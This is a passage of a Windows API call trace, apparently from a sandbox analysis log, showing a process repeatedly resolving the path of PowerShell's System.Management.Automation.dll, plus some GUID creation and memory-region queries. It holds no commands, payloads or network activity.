	[0226.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.418] GetLastError () returned 0x0
	[0226.418] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xd05f009f, Data2=0x5feb, Data3=0x4219, Data4=([0]=0xa4, [1]=0x86, [2]=0xa3, [3]=0xb7, [4]=0xe6, [5]=0x57, [6]=0x83, [7]=0xf6))) returned 0x0
	[0226.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.418] GetLastError () returned 0x0
	[0226.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.418] GetLastError () returned 0x0
	[0226.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.419] GetLastError () returned 0x0
	[0226.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.419] GetLastError () returned 0x0
	[0226.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.505] GetLastError () returned 0x0
	[0226.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.506] GetLastError () returned 0x0
	[0226.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.506] GetLastError () returned 0x0
	[0226.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.506] GetLastError () returned 0x0
	[0226.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.507] GetLastError () returned 0x0
	[0226.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.507] GetLastError () returned 0x0
	[0226.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.507] GetLastError () returned 0x0
	[0226.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.507] GetLastError () returned 0x0
	[0226.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.508] GetLastError () returned 0x0
	[0226.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.508] GetLastError () returned 0x0
	[0226.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.508] GetLastError () returned 0x0
	[0226.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.508] GetLastError () returned 0x0
	[0226.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.508] GetLastError () returned 0x0
	[0226.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.508] GetLastError () returned 0x0
	[0226.510] VirtualQuery (in: lpAddress=0x29cd64, lpBuffer=0x29dd64, dwLength=0x1c | out: lpBuffer=0x29dd64*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.511] VirtualQuery (in: lpAddress=0x29cda0, lpBuffer=0x29dda0, dwLength=0x1c | out: lpBuffer=0x29dda0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.512] GetLastError () returned 0x0
	[0226.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.512] GetLastError () returned 0x0
	[0226.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.512] GetLastError () returned 0x0
	[0226.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.512] GetLastError () returned 0x0
	[0226.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.512] GetLastError () returned 0x0
	[0226.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.513] GetLastError () returned 0x0
	[0226.513] VirtualQuery (in: lpAddress=0x29d0d0, lpBuffer=0x29e0d0, dwLength=0x1c | out: lpBuffer=0x29e0d0*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.513] GetLastError () returned 0x0
	[0226.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.514] GetLastError () returned 0x0
	[0226.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.514] GetLastError () returned 0x0
	[0226.514] VirtualQuery (in: lpAddress=0x29d0d0, lpBuffer=0x29e0d0, dwLength=0x1c | out: lpBuffer=0x29e0d0*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.514] GetLastError () returned 0x0
	[0226.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.514] GetLastError () returned 0x0
	[0226.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.514] GetLastError () returned 0x0
	[0226.515] VirtualQuery (in: lpAddress=0x29d0d0, lpBuffer=0x29e0d0, dwLength=0x1c | out: lpBuffer=0x29e0d0*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.516] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.516] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.518] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.518] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.518] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.519] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.519] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.519] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.520] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.520] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.522] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.522] VirtualQuery (in: lpAddress=0x29cf0c, lpBuffer=0x29df0c, dwLength=0x1c | out: lpBuffer=0x29df0c*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.522] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.524] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.524] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.524] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.524] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x881a54ed, Data2=0x9768, Data3=0x4795, Data4=([0]=0xba, [1]=0x65, [2]=0x9c, [3]=0x39, [4]=0xfe, [5]=0x17, [6]=0xde, [7]=0xb0))) returned 0x0
	[0226.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.525] GetLastError () returned 0x0
	[0226.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.525] GetLastError () returned 0x0
	[0226.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.526] GetLastError () returned 0x0
	[0226.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.526] GetLastError () returned 0x0
	[0226.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.526] GetLastError () returned 0x0
	[0226.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.526] GetLastError () returned 0x0
	[0226.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.526] GetLastError () returned 0x0
	[0226.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.527] GetLastError () returned 0x0
	[0226.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.527] GetLastError () returned 0x0
	[0226.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.527] GetLastError () returned 0x0
	[0226.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.527] GetLastError () returned 0x0
	[0226.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.527] GetLastError () returned 0x0
	[0226.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.527] GetLastError () returned 0x0
	[0226.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.528] GetLastError () returned 0x0
	[0226.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.528] GetLastError () returned 0x0
	[0226.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.528] GetLastError () returned 0x0
